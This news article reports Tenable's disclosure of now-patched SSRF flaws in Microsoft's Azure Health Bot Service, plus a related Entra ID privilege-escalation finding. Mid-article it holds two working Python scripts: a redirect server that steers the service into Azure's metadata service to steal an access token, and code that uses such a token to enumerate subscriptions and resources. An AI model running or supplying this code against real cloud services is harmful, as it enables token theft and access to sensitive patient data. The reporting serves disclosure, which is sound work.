Cybersecurity researchers have discovered two security flaws in Microsoft’s Azure Health Bot Service that, if exploited, could permit a malicious actor to achieve lateral movement within customer environments and access sensitive patient data.
The critical issues, now patched by Microsoft, could have allowed access to cross-tenant resources within the service, Tenable said in a new report shared with The Hacker News.
The Azure AI Health Bot Service is a cloud platform that enables developers in healthcare organizations to build and deploy AI-powered virtual health assistants and create copilots to manage administrative workloads and engage with their patients.
This includes bots created by insurance service providers to allow customers to look up the status of a claim and ask questions about benefits and services, as well as bots managed by healthcare entities to help patients find appropriate care or look up nearby doctors.
Tenable’s research specifically focuses on one aspect of the Azure AI Health Bot Service called Data Connections, which, as the name implies, offers a mechanism for integrating data from external sources, be it third parties or the service providers’ own API endpoints.
While the feature has built-in safeguards to prevent unauthorized access to internal APIs, further investigation found that these protections could be bypassed by issuing redirect responses (i.e., 301 or 302 status codes) when configuring a data connection using an external host under one’s control.
By setting up the host to respond to requests with a 301 redirect destined for Azure’s Instance Metadata Service (IMDS), Tenable said it was possible to obtain a valid metadata response and subsequently get hold of an access token for management.azure[.]com.
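A redirect-based server-side request forgery (SSRF) of this kind needs very little infrastructure on the attacker's side. The following minimal sketch is illustrative only and is not Tenable's proof-of-concept: it shows a hypothetical attacker-controlled host that answers every request with a 301 redirect pointing at the IMDS token endpoint. The port, api-version, and target resource are assumptions, and IMDS normally also expects a "Metadata: true" request header from whichever backend ends up following the redirect.

```python
# Illustrative sketch only: an attacker-controlled endpoint that answers every
# request with a 301 redirect pointing at Azure's Instance Metadata Service
# (IMDS) token endpoint. Hostname, port, and parameters are hypothetical.
from http.server import BaseHTTPRequestHandler, HTTPServer

# IMDS endpoint that issues a managed-identity token for Azure Resource Manager.
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Reply with a 301 so the service backend that fetches this "external"
        # data source is steered into the metadata service instead.
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

    do_POST = do_GET  # treat POST requests the same way

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectHandler).serve_forever()
```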
The token could then be used to list the subscriptions it provides access to by way of a call to a Microsoft endpoint that, in turn, returns an internal subscription ID, which could ultimately be leveraged to list the accessible resources by calling another API.
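As a rough illustration of that enumeration step, the sketch below queries the public Azure Resource Manager REST API with a bearer token. The token placeholder and api-version values are assumptions for illustration; the specific internal Microsoft endpoint Tenable queried is not named in the report.

```python
# Illustrative sketch of enumerating subscriptions and resources with a stolen
# Azure Resource Manager token. Token value and api-versions are placeholders.
import requests

ARM = "https://management.azure.com"
token = "<access token returned by IMDS>"  # placeholder, not a real token
headers = {"Authorization": f"Bearer {token}"}

# List the subscriptions the token grants access to.
subs = requests.get(f"{ARM}/subscriptions?api-version=2020-01-01",
                    headers=headers).json()

for sub in subs.get("value", []):
    sub_id = sub["subscriptionId"]
    # List the resources visible within each subscription.
    resources = requests.get(
        f"{ARM}/subscriptions/{sub_id}/resources?api-version=2021-04-01",
        headers=headers,
    ).json()
    print(sub_id, [r["id"] for r in resources.get("value", [])])
```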
Separately, it was also discovered that another endpoint related to integrating systems that support the Fast Healthcare Interoperability Resources (FHIR) data exchange format was susceptible to the same attack as well.
Tenable said it reported its findings to Microsoft in June and July 2024, following which the Windows maker began rolling out fixes to all regions. There is no evidence that the issue was exploited in the wild.
"The vulnerabilities raise concerns about how chatbots can be exploited to reveal sensitive information," Tenable said in a statement. "In particular, the vulnerabilities involved a flaw in the underlying architecture of the chatbot service, highlighting the importance of traditional web app and cloud security in the age of AI chatbots."
The disclosure comes days after Semperis detailed an attack technique called UnOAuthorized that allows for privilege escalation using Microsoft Entra ID (formerly Azure Active Directory), including the ability to add and remove users from privileged roles. Microsoft has since plugged the security hole.
"A threat actor could have used such access to perform privilege elevation to Global Administrator and install further means of persistence in a tenant," security researcher Eric Woodruff said. "An attacker could also use this access to perform lateral movement into any system in Microsoft 365 or Azure, as well as any SaaS application connected to Entra ID."
Update
Microsoft is tracking the vulnerability under the CVE identifier CVE-2024-38109 (CVSS score: 9.1), describing it as a privilege escalation flaw impacting the Azure Health Bot Service.
"An authenticated attacker can exploit a Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network," the company said in an advisory released on August 13, 2024.